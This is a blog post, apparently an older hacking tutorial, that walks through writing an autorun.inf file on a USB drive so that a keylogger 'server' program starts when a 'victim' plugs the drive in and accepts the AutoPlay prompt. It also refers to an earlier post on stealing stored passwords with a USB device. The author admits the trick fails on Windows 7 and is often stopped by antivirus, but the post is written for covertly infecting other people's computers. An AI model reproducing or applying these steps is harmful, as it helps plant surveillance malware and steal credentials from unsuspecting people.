Few months back, I had posted an article on USB Thief which is helpful to steal stored passwords on the victim computer. One of my friends – Sathyaa asked me to post on how to autorun USB programs. We will tweak Autorun.inf USB file which will help us to autorun USB programs on victim computer. I have explained the steps to autorun USB programs on Windows in the following article.
How to Autorun USB programs using Autorun.inf:
First of all, let us consider a simple situation. What happens when you plug-in USB drive to your computer??? Windows will show you a prompt box. This box is called Autoplay dialog box. On hitting OK, you will be shown the contents of this USB drive.
What we want??? To make certain files (our keylogger server, to be exact) to autorun once USB drive is plugged to computer, without any action from victim’s side. Well, I am sorry to tell you, but as far as I know, this is not possible in Windows XP, Vista and Windows 7. Disappointing??? Yes, absolutely. Then why the hell, I am writing this article??? Let me tell you. In this article, we will try our best to make sure that victim unknowingly autoruns our keylogger server. So, lets start.
Autorun.inf USB hack:
1. Open a notepad file and type the following:
action=Run server Program
label=My Portable PC
Replace “server” with your server name everywhere in the code.
2. Save this notepad file as “autorun.inf” (without quotes).
If you are unable to create the file, download Autorun.inf USB file here.
3. Now, put this file into the root of your USB drive. By root, I mean the default USB folder i.e. say my USB Drive is I: , then
is my autorun file path. Make sure you get this correct.
4. You’ve almost completed the autorun USB hack. Now, safely remove the USB flash drive and plug-in to your victim computer. He will be shown USB dialog box like this:
5. On hitting OK, Windows will autorun USB program, in this case, the server.exe file will start running automatically. Alternately, if you open My Computer, and try to open USB drive by double clicking on it, the server.exe will install itself automatically.
So, the victim doesn’t need to open any sort of file. Whenever he will try to open the USB drive, the autorun.inf USB hack will do its work.
Note: This autorun.inf USB hack has been fixed in Windows 7 and will not work. Also, as far as I know, it is not possible to autorun USB programs on Windows and you can’t bypass the USB dialog prompt. Usually, the program that occupies first position in USB dialog box is run after hitting on OK. So, we will make sure that our server.exe occupies first position in dialog prompt.
Also, you can customize the above code to match your needs. Keep them coming in comments section.
Drawback of Autorun.inf USB hack:
Some of the antiviruses do not allow Autorun.inf file to start automatically and alert the victim of its existence. So, this Autorun.inf USB hack might not work, if AVs play their role.
This was all about the way to autorun USB programs on Windows using Autorun.inf USB file. As you might have noticed, the hack depends a lot on Social Engineering for its success. If you have faced any problem while implementing this autorun.inf USB hack, please mention it in comments.
Enjoy Autorun.inf file hack to autorun USB programs…